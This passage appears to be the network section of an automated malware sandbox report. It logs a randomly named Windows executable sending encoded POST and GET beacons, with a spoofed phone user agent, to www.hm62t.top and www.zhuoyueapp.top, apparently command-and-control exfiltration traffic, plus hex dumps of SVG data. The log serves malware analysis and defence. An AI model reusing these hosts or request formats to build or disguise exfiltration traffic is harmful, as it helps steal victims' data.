                    Data Ascii: transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d=
                    Sep 22, 2024 17:40:42.733692884 CEST1236INData Raw: 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f
                    Data Ascii: roke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0
                    Sep 22, 2024 17:40:42.733720064 CEST1236INData Raw: 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e
                    Data Ascii: e-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.
                    Sep 22, 2024 17:40:42.733741045 CEST672INData Raw: 33 33 32 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                    Data Ascii: 33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.2249
                    Sep 22, 2024 17:40:42.733757973 CEST1236INData Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20
                    Data Ascii: troke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33
                    Sep 22, 2024 17:40:42.733778954 CEST1236INData Raw: 38 35 39 34 20 37 2e 32 39 31 39 36 34 2c 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31
                    Data Ascii: 8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934
                    Sep 22, 2024 17:40:42.733795881 CEST448INData Raw: 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30
                    Data Ascii: 5064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                    Sep 22, 2024 17:40:42.733874083 CEST1236INData Raw: 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33
                    Data Ascii: 298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;st
                    Sep 22, 2024 17:40:42.738723040 CEST1236INData Raw: 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36
                    Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.449746154.23.184.240805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:48.565804005 CEST727OUTPOST /edpl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.hm62t.top/edpl/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 62 39 2b 37 47 62 75 4f 50 70 7a 64 47 31 6f 49 6f 7a 74 42 41 61 78 47 6d 55 34 4f 69 75 32 6c 59 4b 5a 46 70 4f 33 57 62 35 66 73 46 6c 37 54 76 2f 36 38 39 64 35 33 6f 44 78 2f 51 65 7a 35 71 41 31 70 7a 35 44 67 4f 6c 65 7a 55 45 58 5a 4a 2f 76 65 37 6a 33 35 48 64 64 45 33 31 4c 55 36 2b 71 57 5a 34 4e 73 50 37 41 5a 35 36 57 34 77 38 41 6c 4b 36 67 43 44 4a 50 73 53 2b 59 73 6b 51 72 42 4d 2b 4b 4d 47 54 43 33 6e 71 66 63 62 4f 79 58 6e 52 50 64 31 52 76 6a 59 73 36 41 45 76 64 33 2b 34 54 54 71 41 52 75 55 65 54 38 78 6b 4e 74 4e 77 3d 3d
                    Data Ascii: 6X=n9Z7p+EBOElJb9+7GbuOPpzdG1oIoztBAaxGmU4Oiu2lYKZFpO3Wb5fsFl7Tv/689d53oDx/Qez5qA1pz5DgOlezUEXZJ/ve7j35HddE31LU6+qWZ4NsP7AZ56W4w8AlK6gCDJPsS+YskQrBM+KMGTC3nqfcbOyXnRPd1RvjYs6AEvd3+4TTqARuUeT8xkNtNw==
                    Sep 22, 2024 17:40:49.471364021 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:49 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.449747154.23.184.240805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:51.107100010 CEST747OUTPOST /edpl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.hm62t.top/edpl/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 53 6c 5a 72 70 46 6f 4d 50 57 63 35 66 73 4f 46 37 57 77 76 36 69 39 63 46 2f 6f 47 52 2f 51 65 6e 35 71 42 46 70 79 4b 37 2f 63 6c 65 78 63 6b 58 62 57 76 76 65 37 6a 33 35 48 64 49 72 33 31 6a 55 36 50 61 57 49 71 6c 76 46 62 41 61 36 36 57 34 30 38 41 35 4b 36 67 77 44 4d 71 4a 53 39 67 73 6b 52 62 42 4d 76 4b 50 66 44 43 78 6f 4b 65 66 66 4e 6a 53 72 45 33 64 38 43 4c 36 66 2b 2b 6b 49 4a 4d 74 76 4a 79 45 34 41 31 64 4a 5a 61 49 38 6e 77 6b 57 78 61 76 76 35 5a 56 4e 70 41 4b 72 52 53 67 6b 41 63 6d 55 31 49 3d
                    Data Ascii: 6X=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcSlZrpFoMPWc5fsOF7Wwv6i9cF/oGR/Qen5qBFpyK7/clexckXbWvve7j35HdIr31jU6PaWIqlvFbAa66W408A5K6gwDMqJS9gskRbBMvKPfDCxoKeffNjSrE3d8CL6f++kIJMtvJyE4A1dJZaI8nwkWxavv5ZVNpAKrRSgkAcmU1I=
                    Sep 22, 2024 17:40:52.028733015 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:51 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.449748154.23.184.240805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:53.679172039 CEST10829OUTPOST /edpl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.hm62t.top/edpl/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 61 6c 59 64 39 46 6f 72 62 57 64 35 66 73 53 31 37 58 77 76 37 6e 39 64 74 46 6f 47 55 43 51 64 66 35 70 6a 4e 70 36 62 37 2f 57 6c 65 78 65 6b 58 59 4a 2f 75 65 37 6a 47 77 48 64 59 72 33 31 6a 55 36 4e 43 57 59 49 4e 76 57 4c 41 5a 35 36 57 4b 77 38 41 64 4b 36 34 67 44 4e 72 38 53 4e 41 73 6c 78 4c 42 4b 64 53 50 58 44 43 7a 76 4b 65 39 66 4e 76 5a 72 45 43 6d 38 44 76 41 66 38 69 6b 59 66 78 7a 2f 4d 53 6b 37 54 68 43 62 65 36 66 37 6e 73 61 4e 78 75 74 2f 70 5a 61 58 36 4d 62 6d 42 48 56 79 46 78 6e 4b 69 78 67 66 4c 6e 46 76 67 41 59 74 73 2b 47 4e 68 41 71 49 38 38 33 4b 56 6e 64 37 77 6e 30 62 69 42 37 30 67 78 66 6a 78 59 6d 31 74 78 75 57 58 4c 61 4e 53 56 41 41 64 76 74 6f 5a 34 54 6c 6d 7a 47 4a 39 76 66 79 4c 39 35 61 74 33 6e 47 41 4d 79 76 4e 4c 6f 72 32 58 4e 53 61 78 34 4d 43 51 43 4b 75 38 6b 39 41 41 53 74 44 74 77 66 68 64 71 6e 59 59 49 6e 64 37 [TRUNCATED]
                    Data Ascii: 6X=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcalYd9ForbWd5fsS17Xwv7n9dtFoGUCQdf5pjNp6b7/WlexekXYJ/ue7jGwHdYr31jU6NCWYINvWLAZ56WKw8AdK64gDNr8SNAslxLBKdSPXDCzvKe9fNvZrECm8DvAf8ikYfxz/MSk7ThCbe6f7nsaNxut/pZaX6MbmBHVyFxnKixgfLnFvgAYts+GNhAqI883KVnd7wn0biB70gxfjxYm1txuWXLaNSVAAdvtoZ4TlmzGJ9vfyL95at3nGAMyvNLor2XNSax4MCQCKu8k9AAStDtwfhdqnYYInd7qypuTnpiCrxR/DTseasep7MV63SZG39brEYRdSl5WNFoB7sEth95Mpj83n//aYCzOdoUaW+7Q9EadT2SPxTLnQMBwdcJnaR4Vz5lMJ8vZeAvGmYWWhXVNPD06L9fM9LDe/qWqTpDCmbflUYTBEyMlOprou53P+0G8BJdSvgd7XmZs29ouiLVe3PECkVEUnn57xtcwTPd0EkSDWfFIKM9liHzvjzeeiWzS7qiSq89NaXhffNMwyoaHX5F1Limv1uS64S/9jgm/S05akmhv9xen6UDns818/AgX34zDtjRpNoqkzNChiVZl66xkiDUOIULsJfzsER+NIQ6fwnrap59oEn4JBhFXE6cEQMSBcV1ZTSE0UlAcbrpzKM/OkE63e01FOl/BCsmPIhYLX+26MYF9O//3TsRob+MFmgm/aoNZ0y+nli0V9CfL1+LJ/tVXD2m0IF+VsbF/n0SRZcFxYSMVaHGP6CXnj+uH4nhRv0gRA3NCeuEvu/uw0hlYzGkqIKoiwIQdVElN4qdEM3CvjXop8Ttu4L11U0T9YzTPBTkxHVejGX7PhmdhzBW2JpOhkU1/NY4Ap1FygXavxh75doQF6DyCq4JN4VMubNhIYyYixP/oUHLqEUb16Iw2kgwmS7nZfOKQX3R6JxFTxeb2PWB7e1kH7NXRluUbK [TRUNCATED]
                    Sep 22, 2024 17:40:54.628940105 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:54 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.449749154.23.184.240805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:56.233649969 CEST479OUTGET /edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.hm62t.top
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:40:57.181016922 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:57 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.44975047.104.180.139805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:03.006192923 CEST742OUTPOST /6m23/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.zhuoyueapp.top
                    Origin: http://www.zhuoyueapp.top
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.zhuoyueapp.top/6m23/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 30 69 71 64 54 75 73 4e 5a 33 67 6d 64 43 58 46 41 52 31 61 79 33 4b 66 6f 32 6c 70 70 6a 76 7a 6c 6e 72 51 6d 4c 41 46 61 48 69 72 54 5a 4d 38 67 63 6a 49 53 4d 32 43 62 70 51 6e 4f 37 4b 76 64 50 6b 67 4a 67 63 52 2f 37 54 37 2f 50 4b 35 68 2b 76 43 6c 4f 6f 6f 6a 2f 79 4d 2f 36 4e 38 62 5a 32 6f 71 66 76 56 6e 2b 67 4a 49 58 57 76 61 6b 54 43 68 68 72 58 36 34 6f 49 57 4a 69 75 4d 54 2b 7a 55 54 48 46 77 6b 52 4f 52 55 39 67 42 4e 58 57 4b 59 67 72 49 55 77 4a 5a 59 44 6c 4a 4c 39 76 37 30 69 2f 68 46 55 74 30 63 43 77 4f 4e 6b 52 51 3d 3d
                    Data Ascii: 6X=8PnebwmJafIpD0iqdTusNZ3gmdCXFAR1ay3Kfo2lppjvzlnrQmLAFaHirTZM8gcjISM2CbpQnO7KvdPkgJgcR/7T7/PK5h+vClOooj/yM/6N8bZ2oqfvVn+gJIXWvakTChhrX64oIWJiuMT+zUTHFwkRORU9gBNXWKYgrIUwJZYDlJL9v70i/hFUt0cCwONkRQ==
                    Sep 22, 2024 17:41:04.175784111 CEST545INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:41:04 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                    Strict-Transport-Security: max-age=3153600000; includeSubDomains
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.44975147.104.180.139805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:05.563085079 CEST762OUTPOST /6m23/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.zhuoyueapp.top
                    Origin: http://www.zhuoyueapp.top
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.zhuoyueapp.top/6m23/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 48 76 79 45 58 72 52 6a 2f 41 43 61 48 69 79 6a 5a 51 68 77 63 65 49 53 78 44 43 61 46 51 6e 4f 76 4b 76 66 58 6b 67 61 34 62 44 2f 37 52 7a 66 50 49 6b 78 2b 76 43 6c 4f 6f 6f 69 61 66 4d 2f 79 4e 39 6f 42 32 36 59 33 6f 5a 48 2b 6e 4f 49 58 57 6b 36 6b 66 43 68 68 4e 58 34 63 43 49 55 42 69 75 4e 6a 2b 7a 41 48 45 51 67 6b 58 41 78 56 6c 67 42 4d 63 54 2f 31 4a 74 72 45 55 4b 35 42 75 67 50 61 6e 2b 4b 56 31 74 68 68 6e 77 7a 56 32 39 4e 77 74 4b 62 64 78 46 6b 72 6b 66 62 6c 68 48 70 69 42 55 31 47 6f 66 55 30 3d
                    Data Ascii: 6X=8PnebwmJafIpDXqqRUSsL53nq9CXfwRxay7KfsOTp7HvyEXrRj/ACaHiyjZQhwceISxDCaFQnOvKvfXkga4bD/7RzfPIkx+vClOooiafM/yN9oB26Y3oZH+nOIXWk6kfChhNX4cCIUBiuNj+zAHEQgkXAxVlgBMcT/1JtrEUK5BugPan+KV1thhnwzV29NwtKbdxFkrkfblhHpiBU1GofU0=
                    Sep 22, 2024 17:41:06.673520088 CEST545INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:41:06 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                    Strict-Transport-Security: max-age=3153600000; includeSubDomains
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.44975247.104.180.139805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:08.108371019 CEST10844OUTPOST /6m23/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.zhuoyueapp.top
                    Origin: http://www.zhuoyueapp.top
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.zhuoyueapp.top/6m23/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
